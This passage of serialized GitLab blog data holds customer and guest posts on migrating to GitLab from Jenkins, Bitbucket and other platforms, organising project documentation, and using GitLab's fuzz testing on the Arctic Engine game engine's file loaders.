GitLab.**\n\n","security",[867,865,9,184],"DevSecOps",{"slug":869,"featured":6,"template":689},"achieve-slsa-level-2-compliance-with-gitlab","content:en-us:blog:achieve-slsa-level-2-compliance-with-gitlab.yml","Achieve Slsa Level 2 Compliance With Gitlab","en-us/blog/achieve-slsa-level-2-compliance-with-gitlab.yml","en-us/blog/achieve-slsa-level-2-compliance-with-gitlab",{"_path":875,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":876,"content":882,"config":889,"_id":891,"_type":14,"title":892,"_source":16,"_file":893,"_stem":894,"_extension":19},"/en-us/blog/adsoul-devops-transition-to-gitlab-ci",{"title":877,"description":878,"ogTitle":877,"ogDescription":878,"noIndex":6,"ogImage":879,"ogUrl":880,"ogSiteName":673,"ogType":674,"canonicalUrls":880,"schema":881},"How adSoul transitioned to GitLab CI from Jenkins","adSoul, a marketing automation company, outlines a successful three-phase migration plan for moving to GitLab CI from Jenkins.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678442/Blog/Hero%20Images/londoncommit.png","https://about.gitlab.com/blog/adsoul-devops-transition-to-gitlab-ci","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How adSoul transitioned to GitLab CI from Jenkins\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Brein Matturro\"}],\n        \"datePublished\": \"2019-11-05\",\n      }",{"title":877,"description":878,"authors":883,"heroImage":879,"date":885,"body":886,"category":801,"tags":887},[884],"Brein Matturro","2019-11-05","\nadSoul is a Germany-based data-driven online marketing company that aims to improve search engine advertising and scalability for businesses. The core of adSoul relies heavily on API interfaces and entity recognition to post keywords on Google and Bing with marketing automation. \n\nAt GitLab Commit London, [Philipp Westphalen](https://www.linkedin.com/in/philipp-westphalen-a83318188/), fullstack developer at adSoul and GitLab Hero, shares how the company transitioned from Jenkins to GiLab CI. adSoul is a startup company with five developers, and as Philipp says “We literally have no time for everything we need to do.” They were looking for a tool that requires less time-consuming maintanence, and with Jenkins the team found it hard to read their existing files. “Our Jenkins was not so stable at all and it was tough to change because it was managed by our provider,” Philipp says. Cost and visibility were also huge motivators in moving away from [Jenkins to Gitlab CI](/blog/docker-my-precious/).\n\n## GitLab migration in three phases\n\nPhase 1: Move the repository.\nThe [adSoul team](https://www.adsoul.com) used the GitHub Import by GitLab, but had setbacks with migrating their issues, so they created a GitHub open source issue migrator as a resolution. Following that, they modified scripts with the new origin by exchanging the GitHub API call with a GitLab API. “This was really easy and we had a stable build with our new repository, so we could move our product management to GitLab and not need GitHub anymore,” Philipp says.\n\nPhase 2: Migrate the CI/CD pipeline.\nThe team started to create a GitLab CI YAML and tried to do a simple ‘lift and shift,’ however their processes were more complicated than anticipated. Though this phase was time consuming, it became clear the team could move to phase three without hiccups. “Quick pro tip,” says Philipp. “If you’re running your own GitLab runners, increase the log limit if you have to debug your building step.” \n\nPhase 3: Improve the CI/CD pipeline.\nThe team thought about ways of building their software, so they split projects into steps. “Our idea was that one job does one thing perfectly. Each job is simple and everyone can modify it easily” Philipp says. They improved their build time by moving to Gradle, created parallel job processing, and by using standard Docker images for ease of management. \n\n## Takeaways from a successful migration\n\n1. Plan your migration. Get every member of the team involved and aware of the upcoming changes, including how tools are working together and what the expectations are moving forward. “Take your time for the migration,” Philipp says. “It’s not two days and then we are finished.” \n\n2. Go step by step. adSoul used a three phase plan which allowed the team to deploy a new version and still continue to work on existing projects. “We could improve our application without having to wait for a better infrastructure,” Philipp says.\n\n3. Rethink your [DevOps strategy](/blog/better-devops-with-gitlab-ci-cd/). In the time leading up to the migration, examine things like security automation and other important pieces in a DevOps overall strategy.\n\n4. Start with a small project. Work closely with colleagues to create small GitLab CI projects to familiarize everyone before creating larger, overwhelming projects.\n\nPro tip: Keep your pipeline user friendly. Create a good user experience for the team with clear job names, style your config for a better overview, and write comments for variables and hard to understand code. \n\n## Why GitLab works for a small team\n\n“The most important thing is that GitLab is a powerful CI/CD solution with high customization,” Philipp says. There is one home for all projects, without dependencies on one another. With Jenkins, even small exploratory changes can impact the larger job. “With GitLab, you don’t have dependency between branches. So, if you’re trying something new for your CI, you can do it simply in your branch and the master branch will not be affected by the changes,” Philipp says.\n\nThe CI is low maintenance, which is a useful timesaver for a smaller team. “The CI provides us with really low maintenance time. So, usually we don’t have to care about our CI for a month or more,” Philipp says.\n\nTo learn more about adSoul’s migration to GitLab, watch Philipp’s talk from GitLab Commit London.\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/C5xfw0ydh2k\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n",[109,685,9,753,888,845],"startups",{"slug":890,"featured":6,"template":689},"adsoul-devops-transition-to-gitlab-ci","content:en-us:blog:adsoul-devops-transition-to-gitlab-ci.yml","Adsoul Devops Transition To Gitlab Ci","en-us/blog/adsoul-devops-transition-to-gitlab-ci.yml","en-us/blog/adsoul-devops-transition-to-gitlab-ci",{"_path":896,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":897,"content":903,"config":911,"_id":913,"_type":14,"title":914,"_source":16,"_file":915,"_stem":916,"_extension":19},"/en-us/blog/an-agile-approach-to-documentation-and-structure",{"title":898,"description":899,"ogTitle":898,"ogDescription":899,"noIndex":6,"ogImage":900,"ogUrl":901,"ogSiteName":673,"ogType":674,"canonicalUrls":901,"schema":902},"An Agile approach to documentation and structure","Combining flexibility and structure: why we decided to use GitLab.com for all UnscrewMe documentation and code to keep an overview, always find the relevant information quickly, and easily track progress.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749670464/Blog/Hero%20Images/gitlab-loves-open-source.jpg","https://about.gitlab.com/blog/an-agile-approach-to-documentation-and-structure","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"An Agile approach to documentation and structure\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Goetz Buerkle\"}],\n        \"datePublished\": \"2017-12-13\",\n      }",{"title":898,"description":899,"authors":904,"heroImage":900,"date":906,"body":907,"category":10,"tags":908},[905],"Goetz Buerkle","2017-12-13","\n\nWith an idea and a name, I was ready to start working more seriously on\n[UnscrewMe](http://unscrewme.co.uk/), a simple wine tasting scheduler app. Well, almost ready – to avoid ending up with a\nmess of files and folders and stuff scattered across different devices, and\ncertainly never where I need them, my next objective was to set up a central\nlocation where I could store and organize everything flexibly.\n\n\u003C!-- more -->\n\n## GitLab – selecting simple tools\n\nI wanted to keep the overhead low and the management of the documents simple,\nyet extensible enough to cover everything I would need to get started, including\nsimple lists, longer notes, logo drafts, and also more structured technical\nconcepts and even invoices.\n\nBeing a [Certified Scrum Product Owner](https://www.scrumalliance.org/certifications/practitioners/cspo-certification) and using a [GitLab](/) instance at work, I decided to take advantage of the free private repositories and use GitLab.com for UnscrewMe. This combines the simplicity of “just” storing everything in files and folders, with the advantage of being able to use Markdown for more advanced formatting, including sub headings, nested lists and images. And all information can easily be accessed on any device, either via Git directly or the GitLab.com web interface, which also renders Markdown files nicely.\n\nIn addition, project management features of GitLab like [issues](https://docs.gitlab.com/ee/user/project/issues/), [milestones](https://docs.gitlab.com/ee/user/project/milestones/) and\n[Issue Boards](/stages-devops-lifecycle/issueboard/) would provide a useful, flexible and lightweight framework to\ntrack my progress. By defining project phases and grouping all open tasks in\nvarious ways, I could get a quick overview of what I would need to do next,\nbefore I could actually launch my Minimum Viable Product (MVP).\nUsing the full power of GitLab.com, I created a “[Group](https://docs.gitlab.com/ee/user/group/index.html)” and three separate\nrepositories: one for all the general documentation, one for the actual web\napplication, and a third for the pre-launch website.\n\n## Defining a flexible structure\n\nYou could of course call my folder structure flawed, as it is not always entirely\nclear where new content or document should go, but so far it works fine for me.\nI started with a high-level view and specified six broad areas:\n* ideas – for anything largely creative\n* concepts – for more detailed specifications and drafts\n* business – for business plans and similar documents focused on the business in general\n* roadmap – to define the main steps without immediately looking at all the details\n* design – basically, everything that is not text\n* finance – for invoices, contracts, etc.\n\nThese six folders give me enough structure and flexibility to get started,\nwithout having to think too hard about what should go where.\nA couple of years ago, I started prepending most files I create with dates,\nlike “2017–08–31\". I find that adding dates are a useful primary sorting\ncriteria when trying to get a quick overview, so I stuck with this approach for\nmy new project as well, even though it might not be the perfect match for all files.\n\n## Google Keep – enabling quick, low-barrier content generation\n\nWith a system mainly based on text files, I could use any editor. As I started\nusing [Google Keep](https://www.google.com/keep/) for personal notes a few\nmonths ago, I knew that it was flexible and reliable enough for my needs.\n\nI do have a subscription for a very stripped-down text editor, but I must admit,\nthat I don’t like the barely existing interface too much, and started using\nGoogle Keep for many tasks instead. The big benefit of Google Keep, above the\nother web services I used to rely on for writing, is the support of writing\nnotes offline. While these days you mostly have 4G, 3G or wifi anyway, even on\nholiday, I did find myself sometimes at events or in places without connectivity.\nAnd then, being able to write something offline, that would automatically be\nsynchronized as soon as I would be online again, proved rather useful.\n\nThe only obvious drawback for me now is, that Google Keep does not support\nMarkdown for structure and formatting. But as Markdown markup is pretty minimal\nand easy to read, this hasn’t been much of a limitation.\n\nThe notes editor is simple and fast – I do not really need anything more\nadvanced or complicated. What I do value though it the possibility to add labels,\njust a different name for tags, and colors to notes. That way I can easily\ngroup my project notes together and even find the ones I am looking for quickly\nin my main view.\n\n## Visual Studio Code – lightweight editing with Markdown preview and Git support\n\nTo get my basic notes from Google Keep into GitLab, I used [Visual Studio Code](https://code.visualstudio.com/).\nIt is a simple editor with many useful plugins, making editing and checking\nMarkdown documents very convenient and supporting Git out of the box, which was\npretty much all I needed.\n\nOften, my Google Keep notes require just a little bit of cleanup, before they\nare ready to be committed to the Git repository.\nAs I use GitLab milestones and issues to structure all the work, I could also\ntake advantage of this when adding documents to the Git repository and making\nchanges. So I also reference the relevant issues in my commit messages using\n[GitLab Flavored Markdown](https://docs.gitlab.com/ee/user/markdown.html#gitlab-flavored-markdown-gfm) syntax.\n\nNext on my todo list was to [create a simple pre-launch website](https://medium.com/unscrewme/claiming-the-name-257b59d979b)\nto announce the new service, even before it was built. I did read a few times\nthat building a pre-launch website before starting to work on the application\ncode can help to gauge if there even is enough interest for the product. In my\ncase, I was not too concerned about this aspect, since first and foremost, I\nwanted to use my service, therefore by definition it would be worth the effort.\n\n*(I began writing this overview at [Pantry Marylebone](https://www.pantrymarylebone.com/)\nand finished it there too, a few days later. I wrote the final paragraphs there\nafter having had three wines at [108 Brasserie](http://108brasserie.com/) before:\na beautiful and well-balanced 2016 Picpoul de Pinet from Domaine Felines Jourdan\nin Languedoc in France, a surprisingly light and smooth 2016 Montepulciano\nd’Abruzzo from Il Faggio in Italy and a somewhat harsh and slightly disappointing\n2016 Beaujolais Vieilles Vignes par Vincent Fontaine from Domaine de la Rocailler, in France.)*\n\n## About the Guest Author\n\nGoetz Buerkle is currently working to launch UnscrewMe. There are so many wine\ntastings happening in London every day – UnscrewMe wants to help Londoners spend\nless time searching for wine events and more time tasting interesting wines\ninstead. [Keep up with the project](http://unscrewme.co.uk/).\n\n\n*[An Agile approach to documentation and structure](https://medium.com/unscrewme/an-agile-approach-to-documentation-and-structure-5fe4a14a6f2f) was originally published on Medium.*\n",[909,9,910],"agile","user stories",{"slug":912,"featured":6,"template":689},"an-agile-approach-to-documentation-and-structure","content:en-us:blog:an-agile-approach-to-documentation-and-structure.yml","An Agile Approach To Documentation And Structure","en-us/blog/an-agile-approach-to-documentation-and-structure.yml","en-us/blog/an-agile-approach-to-documentation-and-structure",{"_path":918,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":919,"content":925,"config":932,"_id":934,"_type":14,"title":935,"_source":16,"_file":936,"_stem":937,"_extension":19},"/en-us/blog/appsflyer-moves-to-gitlab",{"title":920,"description":921,"ogTitle":920,"ogDescription":921,"noIndex":6,"ogImage":922,"ogUrl":923,"ogSiteName":673,"ogType":674,"canonicalUrls":923,"schema":924},"Why AppsFlyer moved from Bitbucket to GitLab","AppsFlyer migrated from Mercurial to Git so the company could move to GitLab's open source, self-managed solution.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681252/Blog/Hero%20Images/gitlab-appsflyer.png","https://about.gitlab.com/blog/appsflyer-moves-to-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Why AppsFlyer moved from Bitbucket to GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sara Kassabian\"}],\n        \"datePublished\": \"2020-04-27\",\n      }",{"title":920,"description":921,"authors":926,"heroImage":922,"date":928,"body":929,"category":930,"tags":931},[927],"Sara Kassabian","2020-04-27","\n\nResearch shows that [more users are choosing GitLab](/why-gitlab/) as their preferred [version control system](/topics/version-control/). In an [analysis by The New Stack of the results of a 2018 and 2019 Jetbrains developer survey](https://thenewstack.io/i-dont-git-it-tracking-the-source-collaboration-market/), there was an increase in the number of users in the study sample that selected GitLab as their version control system of choice between 2018-2019. In that same period, GitHub had a small decrease in users and Bitbucket had a more substantial decline in the number of users. \n\nOne of the most significant barriers to making the move from a version control system such as Bitbucket or GitHub to GitLab is the data migration process. We have an entire data import team at GitLab that is dedicated to making this process as seamless as possible, but let’s face it, migrating data is always going to be painful. Fortunately, other companies have paved the way to make the migration process a bit more bearable.\n\nAppsFlyer is one of those companies that took the plunge and migrated its entire system from Bitbucket to GitLab, and the team has lived to tell the tale. [Elad Leev](https://www.linkedin.com/in/elad-leev/?originalSubdomain=il), platform engineer at AppsFlyer, explains how the engineering organization managed the migration in a presentation at GitLab Commit San Francisco.\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube-nocookie.com/embed/z_6tVRCyJxs\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n## Why AppsFlyer chose GitLab\n\nBefore showing how AppsFlyer moved to GitLab, it’s valuable to review the business case for _why_ AppsFlyer chose GitLab over other version control systems.\n\nAppsFlyer is a large engineering organization that has more than 300 developers on-staff. Demand for the company's services grew, which translated into more than one million incoming HTTP requests per second or up to 90 billion events per day. AppsFlyer needed to move off the hosted solution it was using with Bitbucket because repositories could be accessed by the public too easily and because latency issues caused some builds to fail. And Bitbucket had restrictions – no more than 1000 calls/hour – and that was an easy target for the growing company to exceed.\n\nAppsFlyer tried moving from the Bitbucket-hosted solution to the closed-source, self-managed option but it was a black box. If there was a bug, it was impossible to know if it was due to their configuration or because something was wrong with the product.\n\nThe company considered GitHub Enterprise, but, like Bitbucket, it is also closed-source and was too expensive for a lower ROI. In the end, they chose GitLab because of our growth and [commitment to transparency](https://handbook.gitlab.com/handbook/values/#transparency) – our default to public and the open issue tracker made it the right fit for AppsFlyer.\n\n## Migrating from Mercurial to Git\n\nIn order to convert from Bitbucket to GitLab, AppsFlyer first needed to convert from Mercurial to Git because GitLab runs on Git.\n\nWhen [Bitbucket first launched in 2008, it only supported Mercurial repos](https://Bitbucket.org/blog/sunsetting-mercurial-support-in-Bitbucket). Notably, Bitbucket is actually going to be migrating from Mercurial to Git beginning as of June 1. So whether or not you’re using GitLab, there is no time like the present to transition your repositories to Git, [the version control tool chosen by almost 90% of developers](https://insights.stackoverflow.com/survey/2018#work-_-version-control).\n\nOne of the most complicated parts of the process for AppsFlyer was getting the code from Mercurial to Git, because there isn’t an immediate way to transfer from one version control tool to another.\n\nElad said AppsFlyer needed to save history, commits, tags and, with AppsFlyer being a rapidly growing start-up, to execute the transition as quickly as possible.\n\nThe AppsFlyer devs found a tool called [Fast-Export](https://github.com/frej/fast-export) which basically migrates code from Mercurial to Git and had success on a few different repositories. But could it scale effectively to migrate all the code in the organization?\n\nNext, the team worked with the R&D organization to create a self-service, Fast-Export wrapper to help with the migration from Mercurial to Git at scale. The Fast-Export wrapper had a few characteristics that made it work:\n\n*   It was a one-liner, so it was easy-to-use\n*   It was idiot-proof, meaning nobody could make a catastrophic mistake\n*   It used a Slack channel to keep everyone in sync\n*   It was safe, meaning you cannot override somebody’s repository by mistake\n\nThe end-to-end process is fairly straightforward, beginning with checking for the repository in GitLab and logging it into the Slack channel once the repo migration is complete.\n\n![Illustration showing AppsFlyer's Mercurial to Git migration process](https://about.gitlab.com/images/blogimages/mercurial_git.jpg){: .shadow.medium.center}\nThe Mercurial to Git migration process using the fast-export wrapper created by AppsFlyer.\n{: .note.text-center}\n\n“It's really, really important to close the old repository to writes in Bitbucket service because it happened to us more than once: A developer used this tool to migrate his repository from Bitbucket to GitLab, but other developers didn't know that the repository was moved,” says Elad.\n\nThe migration from Mercurial to Git came with a few added benefits, including the opportunity to clean up old repositories; greater transparency across teams into the GitLab migration; and increased developer trust.\n\n## Education helps\n\nDocumentation was also a large part of the migration to Git. AppsFlyer used Guru to carefully document internal processes and identified two courses on Pluralsight to help devs. There is also the entertaining cheat sheet – “[Oh Shit, Git!](https://ohshitgit.com/)” ([here is a profanity-free version](https://dangitgit.com/en)) which Elad created to share some edge cases with Git that he encountered through his work.\n\n## Now, moving to GitLab is pretty easy\n\nOnce your source is in Git, it is pretty simple to upload your data into any version control system using a data importer. We have detailed instructions on how to import your data from a different version control system, such as [migrating from Bitbucket to GitLab](https://docs.gitlab.com/ee/user/project/import/bitbucket_server.html), which is what AppsFlyer did.\n\n## Perks of working with an open source, self-managed solution\n\nA self-managed product that is closed-source means the user will always rely on an external vendor when it comes to managing their codebase, and we believe that having end-to-end visibility is essential when it comes to self-hosting. One of the main perks of working with an open source, self-managed version control system such as GitLab is that your team has the flexibility to build upon your existing codebase. Here are a few examples:\n\n*   AppsFlyer created another small, one-liner tool (BB2GL) that connects with Slack to help with data migration. Then, they took it a step further and connected the one-liner repository to Slack.\n*   Set deadlines: AppsFlyer created a scheduled task list that checks all the repos in Bitbucket and all the repos in GitLab to see which projects have been moved from Bitbucket to GitLab and posts a reminder on Slack for the teams.\n*   Created an in-house API wrapper which helped cut-down on code that was duplicative but written in different languages. The API wrapper helped create one location for all the GitLab metadata.\n*   The in-house API Wrapper is updated using GitLab System Hooks. Read Elad’s [in-depth Medium article to learn more about System Hooks](https://medium.com/appsflyer/gitlab-the-magic-of-system-hooks-f38c4f7ca8e7).\n\nIt’s been two years since AppsFlyer made the switch to GitLab, and it’s helped the company’s growth considerably, says Elad. Some team members have abandoned the Atlassian project management tools they used before to switch to GitLab.\n\nBut no product is perfect. There are two bugs that AppsFlyer encountered and raised with GitLab support. One of them has been resolved, [one is still pending](https://gitlab.com/gitlab-org/gitlab/-/issues/14130). This level of visibility into bugs wouldn’t be possible without features like the [public issue tracker](https://docs.gitlab.com/ee/user/project/issues/), which promote transparency and collaboration between GitLab users and internal GitLab teams.\n","news",[751,9,267],{"slug":933,"featured":6,"template":689},"appsflyer-moves-to-gitlab","content:en-us:blog:appsflyer-moves-to-gitlab.yml","Appsflyer Moves To Gitlab","en-us/blog/appsflyer-moves-to-gitlab.yml","en-us/blog/appsflyer-moves-to-gitlab",{"_path":939,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":940,"content":946,"config":954,"_id":956,"_type":14,"title":957,"_source":16,"_file":958,"_stem":959,"_extension":19},"/en-us/blog/arctic-engine-fuzz-testing-blog",{"title":941,"description":942,"ogTitle":941,"ogDescription":942,"noIndex":6,"ogImage":943,"ogUrl":944,"ogSiteName":673,"ogType":674,"canonicalUrls":944,"schema":945},"How Arctic Engine uses GitLab's fuzz testing","Using GitLab's fuzz testing, we discovered and fixed various real defects that could crash our software. Now we can detect vulnerabilities before merging the code.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681504/Blog/Hero%20Images/arcticengine.png","https://about.gitlab.com/blog/arctic-engine-fuzz-testing-blog","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How Arctic Engine uses GitLab's fuzz testing\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Huldra\"}],\n        \"datePublished\": \"2020-08-19\",\n      }",{"title":941,"description":942,"authors":947,"heroImage":943,"date":949,"body":950,"category":951,"tags":952},[948],"Huldra","2020-08-19","\n\n{::options parse_block_html=\"true\" /}\n\n\n\n## About Arctic Engine\n\n[Arctic Engine](https://gitlab.com/huldra/arctic) is an open-source, free game\nengine released under the [MIT license](https://opensource.org/licenses/MIT).\nArctic Engine is implemented in C++ and focuses on simplicity. Being a C++\nprogrammer and making games should not be joyless, disillusioning, and\ndiscouraging. In the '80s and '90s, a programmer could make games alone, and\nit was fun. Arctic Engine aims at making game development in C++ fun again.\n\n## Testing can be fun\n\nTesting the game engine is very important since games are usually no more\nrobust and performant than the underlying middleware or game engine. Writing\ntests by hand is time-consuming and disillusioning, and it may drain the fun\nfrom the development process. So, to my shame, I avoided writing tests in every\nway I could. For instance, I used static analyzers to detect bugs. The problem\nwith static analyzers was the lack of motivation to fix potential issues. You\nmay be unsure whether a bug is really there, and it can sometimes be hard to\nfind a way to trigger it.\n\nThe other possibility was fuzz testing. I heard about fuzzing but didn't try it\nearlier because I thought it was hard to integrate with the project. I could\nnot be more wrong. It's amazing how little effort it takes to get fuzz testing\nup and running with GitLab.\n\n## Fuzz testing and what it exposed\n\nThanks to [Sam Kerr](https://gitlab.com/stkerr) for proving me wrong about\nfuzzing by [actually fuzzing](https://gitlab.com/huldra/arctic/-/commit/946382569d88c3af7f4a7ea075c3c3cb18d3b06b)\nthe sound loader code. Arctic Engine allows loading a sound from a WAV file in\nmemory. To fuzz the loader's code, you create a small CPP file with a single\nfunction like this:\n\n```cpp\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t * data, size_t size) {\n    std::shared_ptr\u003Carctic::SoundInstance> result = arctic::LoadWav(data, size);\n    return 0;\n}\n```\n\nThen you add ``-fsanitize=fuzzer`` flag to the CMakeLists.txt file and a few\nlines to the `.gitlab-ci.yml` file, and the fuzzing begins! You may want to\ndrop in a few WAV files to the corpus folder to help the fuzzer and speed up\nthe process, but that's optional. Ok, it was a little harder than that with the\nArctic Engine because it would output a message and quit upon processing\nunsupported file formats. Still, handling file loading errors this way was a\nbad idea, and I finally had a reason to fix it.\n\nThe fuzzer started crashing Arctic Engine: first, it triggered a signed integer\noverflow, a division by zero, and a buffer overrun. And then, the wave loader\ngot out-of-memory while trying to resample a tiny WAV file with a sampling rate\nof 1 sample per second to 44100 samples per second. Wow.\n\nWhat I liked about fuzzing is that fuzzer actually crashes your program and\nprovides you the input so you can reproduce the crash. And once you've set up\nthe test harness, the entire testing process is fully automated, saving you\ntime and effort. It's like having a personal QA team, you commit your code, and\nin a few minutes, you already have it tests-covered.\n\nThen I fuzzed the CSV and the TGA file parsers and expected to find some bugs\nin the CSV and none in the TGA. What can I say? You may not find bugs where you\nexpect them to be and find bugs where you thought there were none. The TGA\nloader crashed immediately with a buffer overrun. It did not account for files\ncontaining only a valid header but no actual image data after it.\n\n## Plans\n\nI will add a simple HTTP web server and some multiplayer network interaction\ncode to the Arctic Engine. I was putting it off for quite a while now because I\nthought testing would be a pain. Now that I know how easy it is to apply\nGitLab's fuzz testing to any data processing code, I'm very optimistic and\nsomewhat challenged. Like \"Can I make it withstand the fuzzer from the first try?\".\nIt makes writing code fun for me once again.\n\n## Further reading\n\n- [GitLab's coverage-guided fuzz testing documentation](https://docs.gitlab.com/ee/user/application_security/coverage_fuzzing/#coverage-guided-fuzz-testing)\n- [GitLab's Fuzzing 101 playlist](https://www.youtube.com/playlist?list=PL05JrBw4t0KoYzW1CR-g1rMc9Xgmnhjfe)\n\n### About the guest author\n\nHuldra is a senior videogame programmer by day maintainer of the [Arctic Engine](https://gitlab.com/huldra/arctic) by night. She started it because she wanted a game engine that kept simple things simple and made complex things possible.\n","unfiltered",[109,9,865,953,910,953],"testing",{"slug":955,"featured":6,"template":689},"arctic-engine-fuzz-testing-blog","content:en-us:blog:arctic-engine-fuzz-testing-blog.yml","Arctic Engine Fuzz Testing Blog","en-us/blog/arctic-engine-fuzz-testing-blog.yml","en-us/blog/arctic-engine-fuzz-testing-blog",{"_path":961,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":962,"content":968,"config":975,"_id":977,"_type":14,"title":978,"_source":16,"_file":979,"_stem":980,"_extension":19},"/en-us/blog/arm-open-source-makes-a-seamless-migration-to-gitlab",{"title":963,"description":964,"ogTitle":963,"ogDescription":964,"noIndex":6,"ogImage":965,"ogUrl":966,"ogSiteName":673,"ogType":674,"canonicalUrls":966,"schema":967},"Arm Open Source makes a seamless migration to GitLab","DevOps platform switch reaps cost savings of up to 20%.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749670681/Blog/Hero%20Images/a-creative-agencys-gitlab-wishlist.jpg","https://about.gitlab.com/blog/arm-open-source-makes-a-seamless-migration-to-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Arm Open Source makes a seamless migration to GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2022-10-03\",\n      }",{"title":963,"description":964,"authors":969,"heroImage":965,"date":971,"body":972,"category":10,"tags":973},[970],"GitLab","2022-10-03","[Arm](https://www.arm.com/) wanted to modernize its infrastructure to span across internal (private) and open-source collaborative repositories, and, in the process, consolidate some of its key projects on the same underlying infrastructure. Arm selected GitLab as its new platform. \n\nArm builds software that acts as enablement pieces that can be integrated with other software on its architecture. These are foundational pieces of software that often underpin commercial software offerings, from operating systems to middleware applications. Over 99% of mobile devices have Arm-based processors and the software from the Open Source Engineering team powers computers from sensors up to the cloud.\n\n“The magic really happens when you join enablement pieces with other bits of software from other communities and other projects,” explains Andrew Wafaa, distinguished engineer and senior director of software communities at Arm.\n\nThe goal is to give software developers the best of the Arm architecture, he adds. The enablement pieces “leverage a lot of the bells and whistles from the Arm architecture and that allows people to take those and integrate them with other stacks.”\n\n## GitLab open source lets Arm use its own tooling\n\nArm had a mix of stand-alone Git servers internally and public web-based Git service and wanted to consolidate to a single solution for the company’s larger projects. However,  most of the new core infrastructure that Arm is deploying is on native Arm-based hardware, and the Git service is a proprietary solution. \n\nArm would have to work with its previous platform provider to ensure correctness. According to Wafaa, “We'd have to do reviews, and the patch review process is challenging because it's all private and proprietary code, which was a big factor for us in choosing GitLab.” In addition, Arm had concerns about the code ownership of their OSS projects hosted on the external service. Therefore, Arm determined an open source solution like GitLab would be the best option to maximize choice, be cost effective, and minimize vendor lock-in. Moving to GitLab’s self-hosted platform supported effective collaboration and enabled Arm’s software to be hosted on Arm technology.  \n\nAnother large bonus is that because [GitLab is open source](/solutions/open-source/), Arm can use its own tools to support its open source ecosystem. “Using an open source product made sense at the end of the day,’’ Wafaa says. “Another big factor was that GitLab is an enterprise-grade product that provides very similar workflows to what Arm was already using. It was very easy to move from our previous platform to GitLab; the terminology is very similar, as well as the look and feel.”\n\nFurther, GitLab is a self-hosted enterprise product, and it was important to Arm to have good customer support in the event that something goes wrong.\n\nArm hosts about 200 external open source projects, so of course cost was also a consideration, Wafaa says. “When we're looking at future growth plans there needs to be a reasonable amount of savings and GitLab made it appealing cost-wise.” \n\n## Maintaining control every step along the way\n\nArm is in the process of moving internal workloads to the Arm architecture. Although GitLab didn't initially support Arm, the company “was quite happy to work with us and our engineering teams to ensure that it did support Arm” by creating integrations with its infrastructure, Wafaa says.\n\n“The fact that we could have that fine-grained access control was a huge benefit to us and being able to replicate it on AWS Graviton EC2 instances globally gave us that full redundancy and disaster recovery requirements to meet our IT's needs,\" Wafaa says.\n\nBecause Arm is an IP company, security is paramount. Wafaa says they opted for a gradual migration before scaling out. “For us to deploy, we have to go through a number of approvals with various security teams internally, and that went fairly smoothly. It just worked.”\n\nAfter a “mini deployment,” everything is working seamlessly, he says. Now, anyone can run GitLab on Arm from an enterprise perspective.\n\nThen Wafaa and others held their collective breath awaiting feedback. “Our engineering teams can be quite demanding of the infrastructure provided. They are very, very particular.”\n\nSince the teams have been migrated onto GitLab, “they have been full of praise,” which was a pleasant surprise for Dean Arnold, Arm’s DevOps lead for the open source engineering org, Wafaa says, “because he's not used to getting praise from them. It stood up and worked really well for them.”\n\nMigration to GitLab is ongoing with about 90 percent of it complete. “Certain projects are taking longer because they have complex tooling and the integration pieces are still being ironed out,” Wafaa says.\n\nWith the adoption of GitLab, Arm’s Open Source Engineering teams can now offer full end-to-end native development, and can confidently say “software development by Arm, for Arm, on Arm”. GitLab is not just a DevOps tool, it is a tool that helps companies like Arm offer a complete developer experience.\n\n## Solid metrics for Arm\n\nWith GitLab, Arm has found a number of benefits:\n- Ease of CI/CD set up and integration\n- Cost savings of between 15% and 20%\n- Time savings of an average two to four people a month on admin work\n- Tool simplification\n- The ability to share and collaborate on pipelines/code\n- Quick setup of new projects and onboarding of teams\n\nPreviously, there were multiple individual components that would have to be then stitched together, Wafaa says. “GitLab actually offers us more features and more functionality than we're necessarily used to, and that’s great.”\n\nThat’s especially useful because other contributors want to use pretty much every feature possible for their projects, both for corporate and personal use. For example, one engineer uses GitLab in a personal capacity and wants full CI capabilities.\n\nBoth Wafaa and Arnold are confident that once the migration is completed, there will be significant time savings and projects will be onboarded quickly.\n\n## Deployment in the clouds\n\nOn tap now is working through how to share parts of the pipelines so that teams can adopt things quicker, Arnold says. By the time the migration is completed, Arm will have most of what contributors need, he says.\n\nRight now, Arm is using AWS EC2 instances. Looking ahead, Arnold envisions that [deployment between cloud providers](/topics/multicloud/) will become more seamless without having to change underlying code.\n\nSays Wafaa, “Once we've got people fully onto GitLab, then we'll look at how we can expand it and perhaps provide a more robust level of redundancy across geographies via the containerized route. This is an area of ongoing collaboration between Arm and GitLab, and we hope to be able to deploy 